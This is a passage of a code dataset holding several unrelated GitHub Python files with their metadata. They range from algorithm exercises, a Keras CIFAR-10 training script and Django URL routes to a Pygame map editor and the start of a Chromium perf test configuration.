[-math.inf] * (k + 1)\n\n for price in prices:\n for i in range(k, 0, -1):\n sell[i] = max(sell[i], hold[i] + price)\n hold[i] = max(hold[i], sell[i - 1] - price)\n\n return sell[k]\n","repo_name":"codnegaar/Leetcode_Challeng","sub_path":"Leetcode 188 Best Time to Buy and Sell Stock IV.py","file_name":"Leetcode 188 Best Time to Buy and Sell Stock IV.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"2443234457","text":"import sys\nfrom heapq import heappush, heappop\n\n\nclass Graph():\n def __init__(self):\n # graph structure is {\n # Node:\n # incoming: [(length, source), ...]\n # outgoing: [(length, target), ...]\n # greedy_score: 1000000\n # }\n self.graph = {}\n\n self.nodes_captured = None # keep track of nodes already seen (in X)\n self.target_nodes = None # keep track of nodes accessible from X\n\n def _add_new_node(self, node, incoming, outgoing, greedy_score=1000000):\n self.graph[node] = {\n 'incoming': incoming,\n 'outgoing': outgoing,\n 'greedy_score': greedy_score\n }\n def add_node(self, line):\n '''parse line from input and insert node information into graph'''\n line = line.split('\\t')\n source = int(line[0])\n\n for pair_string in line[1:-1]:\n target, length = [int(val) for val in pair_string.split(',')]\n\n if source in self.graph:\n self.graph[source]['outgoing'].append((length, target))\n else:\n self._add_new_node(source, [], [(length, target)])\n\n if target in self.graph:\n self.graph[target]['incoming'].append((length, source))\n else:\n self._add_new_node(target, [(length, target)], [])\n\n # print(self.graph)\n\n def build_graph(self, f):\n '''parse file and add nodes to graph'''\n for line in f.readlines():\n self.add_node(line)\n\n def _further_frontier(self):\n '''move the frontier one node further'''\n next_target = self._get_next_target()\n if not next_target: return None\n self._migrate_node(next_target)\n\n def _get_next_target(self):\n '''figure out which node to migrate next'''\n score, next_target = heappop(self.target_nodes)\n\n while 
next_target in self.nodes_captured:\n if self.target_nodes:\n score, next_target = heappop(self.target_nodes)\n else:\n return None\n\n return next_target\n\n def _migrate_node(self, node):\n '''migrate input node and clean up graph to\n maintain dijkstras invariants\n '''\n # bookkeeping for node migration\n self.nodes_captured.add(node)\n self.nodes_to_find.discard(node)\n node_greedy_score = self.graph[node]['greedy_score']\n\n # graph cleanup after node migration.\n for length, target in self.graph[node]['outgoing']:\n if target not in self.nodes_captured:\n self.graph[target]['greedy_score'] = min(\n self.graph[target]['greedy_score'],\n node_greedy_score + length\n )\n\n heappush(\n self.target_nodes,\n (self.graph[target]['greedy_score'], target)\n )\n\n def search_until_satisfied(self, source, nodes_to_find):\n '''Expand graph frontier until all nodes of interest are found\n or the entire graph connected to the source input is exhausted\n '''\n self.nodes_to_find = set(nodes_to_find)\n self.graph[source]['greedy_score'] = 0\n self.nodes_captured = set()\n self.target_nodes = []\n\n self._migrate_node(source)\n\n while self.target_nodes and self.nodes_to_find:\n self._further_frontier()\n\n print('frontier exhausted or all nodes found')\n print('Target nodes not found:')\n if self.nodes_to_find:\n for node in self.nodes_to_find:\n print(node)\n else:\n print('None')\n\n print('Nodes found:')\n for node in nodes_to_find:\n print('{}:\\t{}'.format(node, self.graph[node]['greedy_score']))\n\n\nif __name__ == '__main__':\n g = Graph()\n\n filename = sys.argv[1]\n\n with open(filename) as f:\n g.build_graph(f)\n\n g.search_until_satisfied(1, [7, 37, 59, 82, 99, 115, 133, 165, 188, 197])\n","repo_name":"rsenseman/Algorithms-Stanford","sub_path":"Programming Assignment 5/dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44334330149","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom nolds import corr_dim, hurst_rs, sampen\r\n\r\n\r\ndef fractal_dimension(X):\r\n # split the signal into intervals of equal length\r\n n = 10\r\n X_min = np.min(X)\r\n X_max = np.max(X)\r\n delta_X = (X_max - X_min) / n\r\n\r\n # count the number of boxes needed to cover each interval\r\n counts = np.zeros(n)\r\n for i in range(n):\r\n box_min = X_min + i * delta_X\r\n box_max = X_min + (i + 1) * delta_X\r\n counts[i] = np.sum((X >= box_min) & (X <= box_max))\r\n\r\n # count the number of boxes needed to cover the whole signal for each box size\r\n box_sizes = np.power(2, np.arange(1, np.floor(np.log2(n)) + 1))\r\n N = np.zeros_like(box_sizes)\r\n for i, size in enumerate(box_sizes):\r\n n_boxes = int(np.floor(n / size))\r\n if n_boxes == 0:\r\n break\r\n Xb = counts[:int(n_boxes * size)]\r\n Xb = np.reshape(Xb, (n_boxes, int(size)))\r\n N[i] = np.sum(np.sum(Xb, axis=1) > 0)\r\n\r\n # fit a straight line\r\n coeff = np.polyfit(np.log(box_sizes[:i]), np.log(N[:i]), 1)\r\n D = coeff\r\n\r\n return D\r\n\r\n\r\nt = pd.date_range(start='2021-01-01', end='2021-03-17', freq='H')\r\n#x = np.round(np.cumsum(np.random.normal(0, 1, size=(t.size)), axis=0), 2)\r\nx = np.round(np.random.normal(0, 1, size=(t.size)), 2)\r\ndf = pd.DataFrame(x, index=t, columns=['x'])\r\n\r\n# entropy\r\nentropia = -np.sum(df['x'] * np.log2(df['x']))\r\nprint(f'entropy = {entropia}')\r\n\r\n# entropy from the
 nolds library\r\nentropia_nolds = sampen(df['x'].values)\r\nprint(f'entropy from nolds = {entropia_nolds}')\r\n\r\n# Hurst exponent\r\nH = hurst_rs(df['x'].values)\r\nprint(f'Hurst exponent = {H}')\r\n\r\n# fractal dimension\r\n# https://en.wikipedia.org/wiki/Fractal_dimension\r\nD = fractal_dimension(df['x'].values)\r\nprint(f'fractal dimension = {-D[0]}')\r\n\r\n# fractal dimension from the nolds library\r\nD_nolds = corr_dim(df['x'].values, 10)\r\nprint(f'fractal dimension from nolds = {D_nolds}')\r\n\r\n\r\nwith plt.style.context('seaborn'):\r\n fig, ax = plt.subplots()\r\n df.plot(ax=ax)\r\nplt.show()\r\n","repo_name":"szadamek/Big-Data-and-Machine-Learning","sub_path":"time_series/fractal_dim_and_hurst_exp.py","file_name":"fractal_dim_and_hurst_exp.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1832316773","text":"''' Trains a (pre trained) network with additional dropout layers for uncertainty estimation'''\r\n\r\n#https://stackoverflow.com/questions/49646304/keras-optimizing-two-outputs-with-a-custom-loss\r\n# https://stackoverflow.com/questions/46663013/what-is-y-true-and-y-pred-when-creating-a-custom-metric-in-keras\r\n# https://towardsdatascience.com/advanced-keras-constructing-complex-custom-losses-and-metrics-c07ca130a618\r\n\r\nimport os\r\nimport datetime\r\nimport time\r\nimport random\r\nimport h5py\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nplt.style.use(\"ggplot\")\r\n\r\nfrom tensorflow.keras.models import Model, load_model\r\nfrom tensorflow.keras.layers import Input, Dense, BatchNormalization, Flatten, concatenate\r\nfrom tensorflow.keras import optimizers\r\nfrom tensorflow.keras.applications.vgg16 import VGG16\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom tensorflow.keras import Input, layers, models, utils\r\nfrom tensorflow.keras import backend as K\r\n\r\nfrom uncertainty_output import Uncertainty_output\r\n\r\n# from customLoss import CategoricalVariance\r\n\r\nWEIGHTS_PATH = ('https://github.com/fchollet/deep-learning-models/'\r\n 'releases/download/v0.1/'\r\n 'vgg16_weights_tf_dim_ordering_tf_kernels.h5')\r\nWEIGHTS_PATH_NO_TOP = ('https://github.com/fchollet/deep-learning-models/'\r\n 'releases/download/v0.1/'\r\n 'vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5')\r\n\r\n# Input image dimensions\r\nIMG_HEIGHT, IMG_WIDTH, IMG_DEPTH = 32, 32, 3\r\nDATASET_NAME = os.path.sep + 'CIFAR10'\r\n\r\nBATCH_SIZE = 128\r\nNUM_CLASSES = 10\r\nEPOCHS_1 = 150\r\nES_PATIENCE_1 = 10\r\nEPOCHS_2 = 30\r\nES_PATIENCE_2 = 10\r\nEPOCHS_3 = 5\r\nES_PATIENCE_3 = 2\r\n\r\nTEST_BATCH_SIZE = 250\r\nTRAIN_TEST_SPLIT = 0.8 # Value between 0 and 1, e.g. 
0.8 creates 80%/20% division train/test\r\nTRAIN_VAL_SPLIT = 0.875\r\n\r\nTRAIN_ALL_LAYERS = True\r\nWEIGHTS_TO_USE = 'imagenet'\r\nLEARN_RATE = 0.00001\r\n\r\n\r\n# Get dataset path\r\nDIR_PATH_HEAD_TAIL = os.path.split(os.path.dirname(os.path.realpath(__file__)))\r\nROOT_PATH = DIR_PATH_HEAD_TAIL[0]\r\nDATA_PATH = ROOT_PATH + os.path.sep + 'Datasets' + DATASET_NAME\r\n\r\n\r\ndef prepare_data():\r\n ''' Load the data and perform shuffle/augmentations if needed '''\r\n # Split the data between train and test sets\r\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\n\r\n # For evaluation, this image is put in the fig_dir created above\r\n test_img_idx = random.randint(0, len(x_test) - 1)\r\n\r\n print(\"\"\"dataset_name = {}, batch_size = {}, num_classes = {}, epochs_1 = {},\r\n epochts_2 = {}, test_img_idx = {},\r\n train_test_split = {}\r\n learn rate = {},\r\n train_all_layers = {}, weights_to_use = {},\r\n es_patience_1 = {}, es_patience_2 = {}, train_val_split = {}\"\"\".format(\r\n DATASET_NAME, BATCH_SIZE, NUM_CLASSES, EPOCHS_1,\r\n EPOCHS_2, test_img_idx,\r\n TRAIN_TEST_SPLIT,\r\n LEARN_RATE,\r\n TRAIN_ALL_LAYERS, WEIGHTS_TO_USE,\r\n ES_PATIENCE_1, ES_PATIENCE_2, TRAIN_VAL_SPLIT))\r\n\r\n x_train = np.asarray(x_train)\r\n y_train = np.asarray(y_train)\r\n x_test = np.asarray(x_test)\r\n y_test = np.asarray(y_test)\r\n\r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 'train samples')\r\n print(x_test.shape[0], 'test samples')\r\n\r\n # convert class vectors to binary class matrices\r\n y_train = tf.keras.utils.to_categorical(y_train, NUM_CLASSES*2)\r\n y_test = tf.keras.utils.to_categorical(y_test, NUM_CLASSES*2)\r\n\r\n return(x_train, y_train, x_test, y_test, test_img_idx)\r\n\r\n\r\ndef main():\r\n ''' Main function '''\r\n # Load data\r\n x_train, y_train, x_test, y_test, test_img_idx = prepare_data()\r\n\r\n x_test, x_val = np.split(x_test, [int(TRAIN_VAL_SPLIT*len(x_test))])\r\n y_test, y_val = np.split(y_test, [int(TRAIN_VAL_SPLIT*len(y_test))])\r\n\r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_train:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Total labels in train set: \", label_count) \r\n\r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_val:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Labels in validation set: \", label_count) \r\n \r\n label_count = [0] * NUM_CLASSES\r\n for lab in y_test:\r\n label_count[np.argmax(lab)] += 1\r\n print(\"Labels in test set: \", label_count) \r\n\r\n # VGG16 since it does not include batch normalization of dropout by itself\r\n Error_model = VGG16(weights=WEIGHTS_TO_USE, include_top=False,\r\n input_shape=(IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH),\r\n classes=NUM_CLASSES)\r\n\r\n # Stacking a new simple convolutional network on top of vgg16\r\n all_layers = [l for l in Error_model.layers]\r\n x = all_layers[0].output\r\n for i in range(1, len(all_layers)):\r\n x = all_layers[i](x)\r\n\r\n # Classification block\r\n x = Flatten(name='flatten')(x)\r\n x = Dense(4096, activation='relu', name='fc1')(x)\r\n last_layer_1 = Dense(4096, activation='relu', name='fc2_1')(x)\r\n last_layer_2 = Dense(4096, activation='relu', name='fc2_2')(x)\r\n classification = Dense(NUM_CLASSES, activation='softmax')(last_layer_1)\r\n Error = Dense(NUM_CLASSES, activation='linear')(last_layer_2)\r\n\r\n out = concatenate([classification, Error])\r\n\r\n # Creating new model\r\n Error_model = Model(inputs=all_layers[0].input, outputs=out)\r\n\r\n Error_model.summary()\r\n\r\n adam = optimizers.Adam(lr=LEARN_RATE)\r\n 
# sgd = optimizers.SGD(lr=LEARN_RATE)\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).error,\r\n metrics=['acc']\r\n )\r\n\r\n print(\"Start fitting\")\r\n \r\n # Dir to store created figures\r\n fig_dir = os.path.join(os.getcwd(), \"CIFAR10\" + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\r\n os.makedirs(fig_dir)\r\n # Dir to store Tensorboard data\r\n log_dir = os.path.join(fig_dir, \"logs\" + os.path.sep + \"fit\" + os.path.sep + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\r\n os.makedirs(log_dir)\r\n\r\n os.chdir(fig_dir)\r\n\r\n mc_1 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='loss', mode='min', save_best_only=True)\r\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\r\n early_stopping_1 = tf.keras.callbacks.EarlyStopping(monitor='loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_1)\r\n\r\n\r\n datagen = ImageDataGenerator(rescale=1./255, dtype='float32')\r\n train_generator = datagen.flow(x_train,\r\n y_train,\r\n batch_size=BATCH_SIZE)\r\n \r\n val_generator = datagen.flow(x_val,\r\n y_val,\r\n batch_size=BATCH_SIZE)\r\n\r\n\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_1,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_1, mc_1])\r\n\r\n Error_model = load_model('best_model.h5', compile=False)\r\n os.remove('best_model.h5')\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).categorical_cross,\r\n metrics=['acc']\r\n )\r\n\r\n mc_2 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='val_loss', mode='min', save_best_only=True)\r\n early_stopping_2 = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_2)\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_2,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_2, mc_2])\r\n\r\n Error_model = load_model('best_model.h5', compile=False)\r\n os.remove('best_model.h5')\r\n\r\n Error_model.compile(\r\n optimizer=adam,\r\n loss=Uncertainty_output(NUM_CLASSES).categorical_error,\r\n metrics=['acc']\r\n )\r\n\r\n mc_3 = tf.keras.callbacks.ModelCheckpoint('best_model.h5', monitor='loss', mode='min', save_best_only=True) \r\n early_stopping_3 = tf.keras.callbacks.EarlyStopping(monitor='loss',\r\n mode='auto', verbose=1, patience=ES_PATIENCE_3)\r\n\r\n Error_model.fit(train_generator,\r\n epochs=EPOCHS_3,\r\n verbose=2,\r\n validation_data=val_generator,\r\n callbacks=[tensorboard_callback, early_stopping_3, mc_3])\r\n\r\n Error_model = load_model('best_model.h5', compile=False)\r\n os.remove('best_model.h5')\r\n\r\n # Save JSON config to disk\r\n json_config = Error_model.to_json()\r\n with open('Error_model_config.json', 'w') as json_file:\r\n json_file.write(json_config)\r\n # Save weights to disk\r\n Error_model.save_weights('Error_weights.h5')\r\n\r\n Error_predictions = Error_model.predict(x_test)\r\n Uncertainty_output(NUM_CLASSES).results_if_label(Error_predictions, y_test, scatter=True, name='CIFAR10_No_Conv')\r\n\r\n Error_predictions = Uncertainty_output(NUM_CLASSES).convert_output_to_uncertainty(Error_predictions)\r\n Uncertainty_output(NUM_CLASSES).results_if_label(Error_predictions, y_test, scatter=True, name='CIFAR10')\r\n\r\n\r\n single_acc = accuracy_score(y_test.argmax(axis=1), Error_predictions[:, :NUM_CLASSES].argmax(axis=1))\r\n print(single_acc)\r\n dir_path_head_tail = 
os.path.split(os.path.dirname(os.getcwd()))\r\n if WEIGHTS_TO_USE is not None:\r\n new_path = dir_path_head_tail[0] + os.path.sep + 'CIFAR10' + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '_' + WEIGHTS_TO_USE + '_' + str(BATCH_SIZE) + 'B' + '_{:.1%}A'.format(single_acc)\r\n else:\r\n new_path = dir_path_head_tail[0] + os.path.sep + 'CIFAR10' + os.path.sep + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '_' + str(BATCH_SIZE) + 'B' + '_{:.1%}A'.format(single_acc)\r\n os.rename(fig_dir, new_path)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Flokman/MasterThesis","sub_path":"VarianceOutput/CIFAR10_VarianceOutput.py","file_name":"CIFAR10_VarianceOutput.py","file_ext":"py","file_size_in_byte":10284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26901672241","text":"__author__ = 'cjoakim'\n\nimport math\n\nfrom .elapsed_time import ElapsedTime\n\n\nclass Speed(object):\n\n def __init__(self, d, et):\n self.dist = d # an instance of Distance\n self.etime = et # an instance of ElapsedTime\n\n def mph(self):\n return self.dist.as_miles() / self.etime.hours()\n\n def kph(self):\n return self.dist.as_kilometers() / self.etime.hours()\n\n def yph(self):\n return self.dist.as_yards() / self.etime.hours()\n\n def pace_per_mile(self):\n spm = self.seconds_per_mile()\n mm = math.floor(spm / 60.0)\n ss = spm - (mm * 60.0)\n\n if ss < 10:\n ss = \"0{0}\".format(ss)\n else:\n ss = \"{0}\".format(ss)\n\n if len(ss) > 5:\n ss = ss[0:5]\n\n return \"{0}:{1}\".format(mm, ss)\n\n def seconds_per_mile(self):\n return float(self.etime.secs / self.dist.as_miles())\n\n def projected_time(self, another_distance, algorithm='simple'):\n if algorithm == 'riegel':\n t1 = float(self.etime.secs)\n d1 = self.dist.as_miles()\n d2 = another_distance.as_miles()\n t2 = t1 * math.pow(float(d2 / d1), float(1.06))\n et = ElapsedTime(t2)\n return et.as_hhmmss()\n else:\n secs = float(self.seconds_per_mile() * another_distance.as_miles())\n et = ElapsedTime(secs)\n return et.as_hhmmss()\n\n def age_graded(self, event_age, graded_age):\n ag_factor = event_age.max_pulse() / graded_age.max_pulse()\n graded_secs = float((self.etime.secs)) * float(ag_factor)\n graded_et = ElapsedTime(graded_secs)\n return Speed(self.dist, graded_et)\n\n def __str__(self):\n template = \"<Speed: {0} {1}>\"\n return template.format(self.dist, self.etime)\n","repo_name":"cjoakim/oss","sub_path":"m26-py/m26/speed.py","file_name":"speed.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16604058891","text":"from django.urls import path\nfrom django.conf.urls import url, include\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n #login and register urls\n path('',views.lindex,name='index'),\n path('login/',views.login_view, name='login_view'),\n path('register/',views.register, name='register'),\n path('logout/', views.logout_user, name=\"logout\"),\n # path('adminpage/', views.hod, name='adminpage'),\n \n #lecturer urls\n path('lecturer_page/',views.lecturer,name='lecturer'),\n path('viewstudent/',views.viewallstudent,name='allstudent'),\n # path('viewAssessment/',views.viewallassess,name='viewallAssessment'),\n # path('viewsupervisorassess/',views.supervisorassessment,name='viewall'),\n path('lectass/',views.lecturerassement,name='viewall'),\n 
path('viewcompanydetails/',views.viewCompanydetails,name='allcompanydetails'),\n path('editview/', views.getAssess),\n path('logbookdetails/',views.logbookdetails,name='logbookdetails'),\n path('viewlog/',views.logbookview),\n path('reportview/',views.reportview,name='reportviews'),\n path('assessed/',views.showassessed,name='assessed'),\n path('lecassess/', views.LecAssess), \n path('lecupdate/', views.LecUpdate), \n path('assessview/',views.viewassess),\n\n\n\n\n\n #students url\n # path('add',views.add),\n path('companydetails/',views.compdet,name='companydetails'),\n path('student/',views.student,name='student'),\n path('student_det/',views.addStudent,name='new_student'),\n path('elogbook/',views.elogbook,name='logbook'),\n path('new_entry',views.elogbook_entry,name='elogbook'),\n path('view/',views.ViewStudent,name='viewstudent'),\n path('up/',views.model_form_upload,name='report'),\n path('view_report/',views.report,name='view_report'), \n path('company/',views.addCompany,name='companyde'),\n path('viewCompany/',views.viewCompany,name='ViewCompany'), \n path('editcompany/',views.editcompany),\n path('updatecompany/',views.updatecompany),\n\n\n\n #suprvisor urls\n # path('',views.student),\n path('viewlogbook/',views.Logbook,name=\"viewlogbooks\"),\n path('log/',views.ViewLogbook),\n path('assessment/',views.viewassessment,name='assess'),\n path('assess/',views.view,name=\"viewassess\"),\n path('supervisor_page/',views.supervisor,name='supervisors'),\n path('studentdetails', views.index,name='details'), \n path('edit/', views.edit), \n path('update/', views.update), \n # path('delete/', views.destroy), \n\n\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"ericdev-202/ibms","sub_path":"attach/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15032741118","text":"import pygame as pg\nimport sys\nimport time\nfrom const import COLOURS\nfrom mouse import Mouse\nfrom keyboard import EditorKeyboardData\nfrom font import PxFont\nfrom toolbar import EditorToolbar\nfrom asset_manager import EditorAssetManager\nfrom map_manager import EditorMapManager\n\n\nclass PgEditor:\n def __init__(self, screen_size=(1280, 720), canvas_size=(640, 360)) -> None:\n pg.init()\n pg.event.set_allowed([pg.QUIT, pg.KEYDOWN, pg.KEYUP, pg.MOUSEBUTTONDOWN, pg.MOUSEBUTTONUP])\n pg.display.set_caption(\"Pygame 2D Pixel Art Map Editor\")\n self.screen_size = screen_size\n self.screen = pg.display.set_mode(screen_size)\n self.canvas_size = canvas_size\n self.canvas = pg.Surface(canvas_size).convert()\n self.ratio = (self.screen_size[0]/self.canvas_size[0], self.screen_size[1]/self.canvas_size[1])\n self.running = 1\n \n self.fps = 60\n self.clock = pg.time.Clock()\n\n self.mouse = Mouse()\n self.keyboard = EditorKeyboardData()\n \n self.font = PxFont()\n\n self.toolbar_w = self.canvas_size[0]\n self.toolbar_h = self.canvas_size[1]/15\n self.toolbar_size = (self.toolbar_w, self.toolbar_h)\n self.toolbar = EditorToolbar(self.toolbar_size, self.font)\n\n self.asset_manager_w = self.canvas_size[0]/5\n self.asset_manager_h = self.canvas_size[1]-self.toolbar_h\n self.asset_manager_size = (self.asset_manager_w, self.asset_manager_h)\n self.asset_manager = EditorAssetManager(self.asset_manager_size, self.toolbar_h, self.font)\n\n self.map_manager_w = self.canvas_size[0]-self.asset_manager_w\n self.map_manager_h = 
self.canvas_size[1]-self.toolbar_h\n self.map_manager_size = (self.map_manager_w, self.map_manager_h)\n self.map_size = (640, 352)\n self.map_manager = EditorMapManager(self.map_manager_size, self.map_size, self.asset_manager_w, self.toolbar_h, self.font)\n \n def run(self) -> None:\n while self.running:\n self.events()\n self.update()\n self.render()\n self.clock.tick(self.fps)\n time.sleep(1/self.fps)\n\n pg.quit()\n sys.exit()\n\n def events(self) -> None:\n # update mouse position\n self.mouse.data['pos'] = (pg.mouse.get_pos()[0]/self.ratio[0], pg.mouse.get_pos()[1]/self.ratio[1])\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.running = 0\n\n # handle mouse event\n if event.type == pg.MOUSEBUTTONDOWN:\n if event.button == 1: # left click down\n self.mouse.data['l_click'] = 1\n self.mouse.data['l_clicking'] = 1\n if event.button == 3: # right click down\n self.mouse.data['r_click'] = 1\n self.mouse.data['r_clicking'] = 1\n if event.type == pg.MOUSEBUTTONUP:\n if event.button == 1: # left click up\n self.mouse.data['l_clicking'] = 0\n if event.button == 3: # right click up\n self.mouse.data['r_clicking'] = 0\n\n # handle keyboard event\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_LEFT:\n self.keyboard.data['arrow keys']['left'] = 1\n if event.key == pg.K_RIGHT:\n self.keyboard.data['arrow keys']['right'] = 1\n if event.key == pg.K_UP:\n self.keyboard.data['arrow keys']['up'] = 1\n if event.key == pg.K_DOWN:\n self.keyboard.data['arrow keys']['down'] = 1\n if event.key == pg.K_a:\n self.keyboard.data['regular keys']['a'] = 1\n if event.key == pg.K_b:\n self.keyboard.data['regular keys']['b'] = 1\n if event.key == pg.K_c:\n self.keyboard.data['regular keys']['c'] = 1\n if event.key == pg.K_d:\n self.keyboard.data['regular keys']['d'] = 1\n if event.key == pg.K_e:\n self.keyboard.data['regular keys']['e'] = 1\n if event.key == pg.K_f:\n self.keyboard.data['regular keys']['f'] = 1\n if event.key == pg.K_g:\n self.keyboard.data['regular keys']['g'] = 1\n if event.key == pg.K_h:\n self.keyboard.data['regular keys']['h'] = 1\n if event.key == pg.K_i:\n self.keyboard.data['regular keys']['i'] = 1\n if event.key == pg.K_j:\n self.keyboard.data['regular keys']['j'] = 1\n if event.key == pg.K_k:\n self.keyboard.data['regular keys']['k'] = 1\n if event.key == pg.K_l:\n self.keyboard.data['regular keys']['l'] = 1\n if event.key == pg.K_m:\n self.keyboard.data['regular keys']['m'] = 1\n if event.key == pg.K_n:\n self.keyboard.data['regular keys']['n'] = 1\n if event.key == pg.K_o:\n self.keyboard.data['regular keys']['o'] = 1\n if event.key == pg.K_p:\n self.keyboard.data['regular keys']['p'] = 1\n if event.key == pg.K_q:\n self.keyboard.data['regular keys']['q'] = 1\n if event.key == pg.K_r:\n self.keyboard.data['regular keys']['r'] = 1\n if event.key == pg.K_s:\n self.keyboard.data['regular keys']['s'] = 1\n if event.key == pg.K_t:\n self.keyboard.data['regular keys']['t'] = 1\n if event.key == pg.K_u:\n self.keyboard.data['regular keys']['u'] = 1\n if event.key == pg.K_v:\n self.keyboard.data['regular keys']['v'] = 1\n if event.key == pg.K_w:\n self.keyboard.data['regular keys']['w'] = 1\n if event.key == pg.K_x:\n self.keyboard.data['regular keys']['x'] = 1\n if event.key == pg.K_y:\n self.keyboard.data['regular keys']['y'] = 1\n if event.key == pg.K_z:\n self.keyboard.data['regular keys']['z'] = 1\n if event.key == pg.K_SPACE:\n self.keyboard.data['regular keys'][' '] = 1\n if event.key == pg.K_ESCAPE:\n self.keyboard.data['special keys']['esc'] = 1\n if event.key == 
pg.K_DELETE or event.key == pg.K_BACKSPACE:\n self.keyboard.data['regular keys']['del'] = 1\n if event.key == pg.K_0:\n self.keyboard.data['regular keys']['0'] = 1\n if event.key == pg.K_1:\n self.keyboard.data['regular keys']['1'] = 1\n if event.key == pg.K_2:\n self.keyboard.data['regular keys']['2'] = 1\n if event.key == pg.K_3:\n self.keyboard.data['regular keys']['3'] = 1\n if event.key == pg.K_4:\n self.keyboard.data['regular keys']['4'] = 1\n if event.key == pg.K_5:\n self.keyboard.data['regular keys']['5'] = 1\n if event.key == pg.K_6:\n self.keyboard.data['regular keys']['6'] = 1\n if event.key == pg.K_7:\n self.keyboard.data['regular keys']['7'] = 1\n if event.key == pg.K_8:\n self.keyboard.data['regular keys']['8'] = 1\n if event.key == pg.K_9:\n self.keyboard.data['regular keys']['9'] = 1\n\n if event.type == pg.KEYUP:\n if event.key == pg.K_LEFT:\n self.keyboard.data['arrow keys']['left'] = 0\n if event.key == pg.K_RIGHT:\n self.keyboard.data['arrow keys']['right'] = 0\n if event.key == pg.K_UP:\n self.keyboard.data['arrow keys']['up'] = 0\n if event.key == pg.K_DOWN:\n self.keyboard.data['arrow keys']['down'] = 0\n\n def update(self) -> None:\n self.canvas.fill(COLOURS['blue 3']) # wipe canvas for new frame\n \n # update objects\n self.toolbar.update(self.mouse.data, self.keyboard.data)\n self.asset_manager.update(self.mouse.data)\n self.map_manager.update(self.mouse.data, self.keyboard.data, self.asset_manager.get_data(), self.toolbar.get_data(), self.toolbar)\n self.mouse.reset_click_status()\n self.keyboard.reset_key_status()\n\n def render(self) -> None:\n # render objects\n # render stack - bottom\n self.map_manager.render(self.canvas)\n self.asset_manager.render(self.canvas)\n self.toolbar.render(self.canvas)\n # render stack - top\n\n # blit canvas to screen and update display\n self.screen.blit(pg.transform.scale(self.canvas, self.screen_size), (0,0))\n pg.display.update()","repo_name":"Teorija/PgEditor","sub_path":"pg_editor.py","file_name":"pg_editor.py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24663896145","text":"import json\nimport os\nimport sys\n\nfrom chrome_telemetry_build import chromium_config\n\nsys.path.append(chromium_config.GetTelemetryDir())\nfrom telemetry import benchmark as benchmark_module\nfrom telemetry.core import discover\nfrom telemetry.util import bot_utils\n\n\nSCRIPT_TESTS = [\n {\n 'args': [\n 'gpu_perftests',\n '--adb-path',\n 'src/third_party/catapult/devil/bin/deps/linux2/x86_64/bin/adb',\n ],\n 'name': 'gpu_perftests',\n 'script': 'gtest_perf_test.py',\n 'testers': {\n 'chromium.perf': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [3]\n },\n {\n 'name': 'Android Nexus5 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus7v2 Perf',\n 'shards': [2]\n },\n {\n 'name': 'Android Nexus9 Perf',\n 'shards': [2]\n }\n ],\n 'chromium.perf.fyi': [\n {\n 'name': 'Android Galaxy S5 Perf',\n 'shards': [1]\n },\n ]\n }\n },\n {\n 'args': [\n 'cc_perftests',\n '--adb-path',\n 'src/third_party/catapult/devil/bin/deps/linux2/x86_64/bin/adb',\n ],\n 